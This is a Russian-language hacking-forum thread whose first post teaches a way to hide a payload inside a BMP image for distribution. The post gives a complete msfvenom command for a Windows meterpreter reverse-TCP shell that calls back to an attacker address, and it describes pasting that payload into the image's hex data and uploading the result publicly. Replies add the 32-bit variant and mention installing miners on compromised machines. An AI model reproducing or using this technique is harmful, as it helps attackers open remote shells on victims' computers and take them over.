Злая КАРТИНКА

baddagh

ОПЫТНЫЙ USER
Регистрация
27 Дек 2021
Сообщения
56
Реакции
6
Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt
5n0gZ8Bl.png

Xq9D53il.png

LEnYSdyl.png

FtNsnkol.png


Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!

vT6cDHsl.png


переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!
XZb2xqDl.png

ogOhgzcl.png

irKC8mEl.png

1bVoShyl.png


смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"
mVmC0Kzl.png

ndYSoHfl.png

eEe3Uzql.png

KXiFH48l.png

2E3BFZJl.png


Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

IZqyQ22.png
 
Чет я допенькать не могу, н@хуй оно надо то xD
 
Уточнение - если вы создаёте payload для x32 системы используйте "windows/meterpreter/reverse_tcp" вместо "windows/x64/meterpreter/reverse_tcp"
 
Чет я допенькать не могу, н@хуй оно надо то xD

Зохватит тачку. Заливает meterpreter в корень папки windows, а там можно и майнера закинуть. Это если я всё правильно понял.

Да и вообще, господа, вы странные. Сидите на форуме таком и даже в гугл заглянуть не судьба? Вы наверно даже о kali никогда не слышали и linux только в страшных снах видели? Я за 2 минуты гугления уже примерно понял что это за зверь и что примерно делает.
 
ТС объясни по подробней. Что это даст?Что произойдет при открытие картинки?
 
@SoundX, Малыш,не плачь, я знаю что ты "самый" умный. Я загуглил, понял что это, но смысл от этой картинки не понял
 
Статья с сайта codeby. Чел, если ты берёшь статью с другого сайта ты сначала сам её прочитай. Это только первая часть статьи, вторую автор не написал. Так что не нужно такое выкладывать.
 
Чет я допенькать не могу, н@хуй оно надо то xD

тоже интересно, что же будет при открытии картинки.

ТС объясни по подробней. Что это даст?Что произойдет при открытие картинки?
Почитал я комменты на codeby, там автор пишет что payload в картинке выполняется с помощью специального скрипта, который предварительно нужно загрузить на сервер.
Потом остаётся только сессию принять.
 
норм тема
 
Очень злая штука, сейчас будем пробовать!
 
очень интерестная схема
 
Назад
Сверху